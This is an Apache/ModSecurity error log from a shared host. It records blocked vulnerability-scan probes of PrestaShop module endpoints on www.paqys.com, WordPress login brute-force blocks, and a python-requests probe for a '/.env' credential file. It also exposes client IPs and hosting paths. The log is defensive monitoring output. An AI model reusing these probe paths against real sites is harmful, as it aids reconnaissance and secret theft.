[Tue May 26 15:29:25.903723 2026] [security2:error] [pid 715645:tid 715845] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_XVGgMGh8k213RgALAAAAEY"]
[Tue May 26 15:29:26.028438 2026] [core:crit] [pid 715645:tid 715787] (13)Permission denied: [client 146.56.199.139:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:29:26.163838 2026] [security2:error] [pid 715645:tid 715840] [client 103.151.173.206:59351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_accounts/ps_accounts.php"] [unique_id "ahVu_nVGgMGh8k213RgAPgAAAEE"]
[Tue May 26 15:29:26.227556 2026] [security2:error] [pid 715645:tid 715883] [client 103.151.173.206:59363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/pkfacebook/pkfacebook.php"] [unique_id "ahVu_nVGgMGh8k213RgAQgAAAGw"]
[Tue May 26 15:29:26.235907 2026] [security2:error] [pid 715645:tid 715805] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_nVGgMGh8k213RgAPQAAAB4"]
[Tue May 26 15:29:26.243500 2026] [security2:error] [pid 715645:tid 715812] [client 103.151.173.206:59385] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/payplug/payment.php"] [unique_id "ahVu_nVGgMGh8k213RgAQwAAACU"]
[Tue May 26 15:29:26.268181 2026] [security2:error] [pid 715645:tid 715836] [client 103.151.173.206:59371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_checkout/ajax.php"] [unique_id "ahVu_nVGgMGh8k213RgARAAAAD0"]
[Tue May 26 15:29:26.502815 2026] [security2:error] [pid 715645:tid 715862] [client 103.151.173.206:57922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_metrics/ps_metrics.php"] [unique_id "ahVu_nVGgMGh8k213RgASQAAAFc"]
[Tue May 26 15:29:26.604604 2026] [security2:error] [pid 715645:tid 715841] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_nVGgMGh8k213RgATgAAAEI"]
[Tue May 26 15:29:26.899460 2026] [security2:error] [pid 715645:tid 715896] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_nVGgMGh8k213RgAYAAAAHk"]
[Tue May 26 15:29:27.265574 2026] [security2:error] [pid 715645:tid 715818] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_3VGgMGh8k213RgAZwAAACs"]
[Tue May 26 15:29:27.573294 2026] [security2:error] [pid 715645:tid 715809] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_3VGgMGh8k213RgAdwAAACI"]
[Tue May 26 15:29:27.628820 2026] [security2:error] [pid 715645:tid 715806] [client 85.11.167.19:32780] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "blog.jhonweb.com"] [uri "/.env"] [unique_id "ahVu_3VGgMGh8k213RgAfAAAAB8"]
[Tue May 26 15:29:27.811384 2026] [security2:error] [pid 715645:tid 715887] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu_3VGgMGh8k213RgAcAAAAHA"]
[Tue May 26 15:29:27.846137 2026] [security2:error] [pid 715645:tid 715898] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu_3VGgMGh8k213RgAhAAAAHs"]
[Tue May 26 15:29:28.048525 2026] [security2:error] [pid 715645:tid 715889] [client 103.151.173.206:36410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_googleanalytics/ps_googleanalytics.php"] [unique_id "ahVvAHVGgMGh8k213RgAkAAAAHI"]
[Tue May 26 15:29:28.112631 2026] [security2:error] [pid 715645:tid 715847] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAHVGgMGh8k213RgAjwAAAEg"]
[Tue May 26 15:29:28.112639 2026] [security2:error] [pid 715645:tid 715831] [client 103.151.173.206:36412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_facebook/ps_facebook.php"] [unique_id "ahVvAHVGgMGh8k213RgAkQAAADg"]
[Tue May 26 15:29:28.126329 2026] [security2:error] [pid 715645:tid 715800] [client 103.151.173.206:36424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/psxmarketingwithgoogle/psxmarketingwithgoogle.php"] [unique_id "ahVvAHVGgMGh8k213RgAkgAAABk"]
[Tue May 26 15:29:28.174054 2026] [security2:error] [pid 715645:tid 715896] [client 85.11.167.19:32796] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "blog.jhonweb.com"] [uri "/"] [unique_id "ahVvAHVGgMGh8k213RgAlgAAAHk"]
[Tue May 26 15:29:28.260661 2026] [security2:error] [pid 715645:tid 715877] [client 103.151.173.206:36440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/productcomments/productcomments.php"] [unique_id "ahVvAHVGgMGh8k213RgAnwAAAGY"]
[Tue May 26 15:29:28.403321 2026] [security2:error] [pid 715645:tid 715884] [client 103.151.173.206:36442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_facetedsearch/ps_facetedsearch.php"] [unique_id "ahVvAHVGgMGh8k213RgAowAAAG0"]
[Tue May 26 15:29:28.504225 2026] [security2:error] [pid 715645:tid 715901] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAHVGgMGh8k213RgAqAAAAH4"]
[Tue May 26 15:29:28.681362 2026] [security2:error] [pid 715645:tid 715832] [client 115.96.113.172:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvAHVGgMGh8k213RgAmgAAADk"]
[Tue May 26 15:29:28.821577 2026] [security2:error] [pid 715645:tid 715801] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAHVGgMGh8k213RgArwAAABo"]
[Tue May 26 15:29:28.929638 2026] [security2:error] [pid 715645:tid 715782] [client 84.147.56.227:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "houstontxmobilecovidlab.taotechservices.com"] [uri "/index.php"] [unique_id "ahVvAHVGgMGh8k213RgAqQAAAAc"], referer: https://houstontxmobilecovidlab.taotechservices.com/
[Tue May 26 15:29:29.113226 2026] [security2:error] [pid 715645:tid 715787] [client 103.151.173.206:15553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/blockwishlist/blockwishlist.php"] [unique_id "ahVvAXVGgMGh8k213RgAuQAAAAw"]
[Tue May 26 15:29:29.328873 2026] [security2:error] [pid 715645:tid 715863] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAXVGgMGh8k213RgAvAAAAFg"]
[Tue May 26 15:29:29.633743 2026] [security2:error] [pid 715645:tid 715798] [client 91.230.225.116:39809] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAXVGgMGh8k213RgAxwAAABc"]
[Tue May 26 15:29:29.792618 2026] [security2:error] [pid 715645:tid 715697] [remote 209.42.19.17:41096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVvAXVGgMGh8k213RgAyAAAZTM"]
[Tue May 26 15:29:29.906446 2026] [security2:error] [pid 715645:tid 715811] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAXVGgMGh8k213RgA0QAAACQ"]
[Tue May 26 15:29:29.965684 2026] [security2:error] [pid 715645:tid 715848] [client 103.151.173.206:15595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/adobe_stock/ajax.php"] [unique_id "ahVvAXVGgMGh8k213RgA2wAAAEk"]
[Tue May 26 15:29:29.970097 2026] [security2:error] [pid 715645:tid 715856] [client 103.151.173.206:15559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/ps_checkout/express_checkout.php"] [unique_id "ahVvAXVGgMGh8k213RgA3AAAAFE"]
[Tue May 26 15:29:29.977906 2026] [security2:error] [pid 715645:tid 715889] [client 103.151.173.206:15585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/boxtal/ajax.php"] [unique_id "ahVvAXVGgMGh8k213RgA3QAAAHI"]
[Tue May 26 15:29:30.026392 2026] [security2:error] [pid 715645:tid 715854] [client 103.151.173.206:15561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/payplug/ajax.php"] [unique_id "ahVvAnVGgMGh8k213RgA3gAAAE8"]
[Tue May 26 15:29:30.214424 2026] [security2:error] [pid 715645:tid 715894] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvAXVGgMGh8k213RgAywAAAHc"]
[Tue May 26 15:29:30.219999 2026] [security2:error] [pid 715645:tid 715786] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAnVGgMGh8k213RgA5AAAAAs"]
[Tue May 26 15:29:30.286847 2026] [security2:error] [pid 715645:tid 715868] [client 103.151.173.206:15573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/pkfacebook/facebookConnect.php"] [unique_id "ahVvAnVGgMGh8k213RgA6AAAAF0"]
[Tue May 26 15:29:30.790079 2026] [security2:error] [pid 715645:tid 715866] [client 103.151.173.206:15609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/boxtalconnect/ajax.php"] [unique_id "ahVvAnVGgMGh8k213RgA-AAAAFs"]
[Tue May 26 15:29:30.843195 2026] [security2:error] [pid 715645:tid 715822] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvAnVGgMGh8k213RgA9wAAAC8"]
[Tue May 26 15:29:31.157901 2026] [security2:error] [pid 715645:tid 715847] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvA3VGgMGh8k213RgBBAAAAEg"]
[Tue May 26 15:29:31.377293 2026] [security2:error] [pid 715645:tid 715683] [remote 146.190.97.18:60961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.97.190.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVvA3VGgMGh8k213RgBCAAADyU"]
[Tue May 26 15:29:31.392102 2026] [security2:error] [pid 715645:tid 715692] [remote 146.190.97.18:60960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.97.190.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVvA3VGgMGh8k213RgBCQAANS4"]
[Tue May 26 15:29:31.483838 2026] [security2:error] [pid 715645:tid 715843] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvA3VGgMGh8k213RgBEgAAAEQ"]
[Tue May 26 15:29:31.601218 2026] [security2:error] [pid 715645:tid 715821] [client 103.151.173.206:61736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 206.173.151.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.paqys.com"] [uri "/modules/envoimoinscher/ajax.php"] [unique_id "ahVvA3VGgMGh8k213RgBIgAAAC4"]
[Tue May 26 15:29:31.915230 2026] [security2:error] [pid 715645:tid 715823] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvA3VGgMGh8k213RgBJgAAADA"]
[Tue May 26 15:29:31.959033 2026] [security2:error] [pid 715645:tid 715810] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvA3VGgMGh8k213RgBHQAAACM"]
[Tue May 26 15:29:32.188338 2026] [security2:error] [pid 715645:tid 715835] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBHVGgMGh8k213RgBMgAAADw"]
[Tue May 26 15:29:32.434280 2026] [authz_core:error] [pid 715645:tid 715784] [client 103.151.173.206:61749] AH01630: client denied by server configuration: /home2/paqys91a/public_html/themes/hummingbird
[Tue May 26 15:29:32.537324 2026] [security2:error] [pid 715645:tid 715844] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBHVGgMGh8k213RgBOQAAAEU"]
[Tue May 26 15:29:32.826187 2026] [security2:error] [pid 715645:tid 715853] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBHVGgMGh8k213RgBRQAAAE4"]
[Tue May 26 15:29:33.110290 2026] [security2:error] [pid 715645:tid 715811] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBXVGgMGh8k213RgBSwAAACQ"]
[Tue May 26 15:29:33.418105 2026] [security2:error] [pid 715645:tid 715889] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBXVGgMGh8k213RgBVAAAAHI"]
[Tue May 26 15:29:33.724394 2026] [security2:error] [pid 715645:tid 715884] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBXVGgMGh8k213RgBXgAAAG0"]
[Tue May 26 15:29:34.025779 2026] [security2:error] [pid 715645:tid 715901] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBXVGgMGh8k213RgBZwAAAH4"]
[Tue May 26 15:29:34.301021 2026] [security2:error] [pid 715645:tid 715819] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBnVGgMGh8k213RgBcAAAACw"]
[Tue May 26 15:29:34.470562 2026] [security2:error] [pid 715645:tid 715868] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvBnVGgMGh8k213RgBagAAAF0"]
[Tue May 26 15:29:34.825442 2026] [security2:error] [pid 715645:tid 715798] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvBnVGgMGh8k213RgBfwAAABc"]
[Tue May 26 15:29:35.157202 2026] [security2:error] [pid 715645:tid 715817] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvB3VGgMGh8k213RgBiAAAACo"]
[Tue May 26 15:29:35.451820 2026] [security2:error] [pid 715645:tid 715859] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvB3VGgMGh8k213RgBlQAAAFQ"]
[Tue May 26 15:29:35.510553 2026] [security2:error] [pid 715645:tid 715653] [remote 40.77.167.28:5546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grandconclaveindia.org.in"] [uri "/gci-grandofficers.php"] [unique_id "ahVvB3VGgMGh8k213RgBmQAAAgc"]
[Tue May 26 15:29:35.696792 2026] [security2:error] [pid 715645:tid 715879] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvB3VGgMGh8k213RgBogAAAGg"]
[Tue May 26 15:29:35.991099 2026] [security2:error] [pid 715645:tid 715857] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvB3VGgMGh8k213RgBqQAAAFI"]
[Tue May 26 15:29:36.259619 2026] [security2:error] [pid 715645:tid 715882] [client 91.230.225.116:39809] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvCHVGgMGh8k213RgBsgAAAGs"]
[Tue May 26 15:29:36.773867 2026] [security2:error] [pid 715645:tid 715784] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvCHVGgMGh8k213RgBxgAAAAk"]
[Tue May 26 15:29:37.075696 2026] [security2:error] [pid 715645:tid 715820] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvCHVGgMGh8k213RgB0AAAAC0"]
[Tue May 26 15:29:37.099754 2026] [security2:error] [pid 715645:tid 715887] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvCHVGgMGh8k213RgBwwAAAHA"]
[Tue May 26 15:29:37.361771 2026] [security2:error] [pid 715645:tid 715893] [client 91.230.225.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVvCXVGgMGh8k213RgB5AAAAHY"]
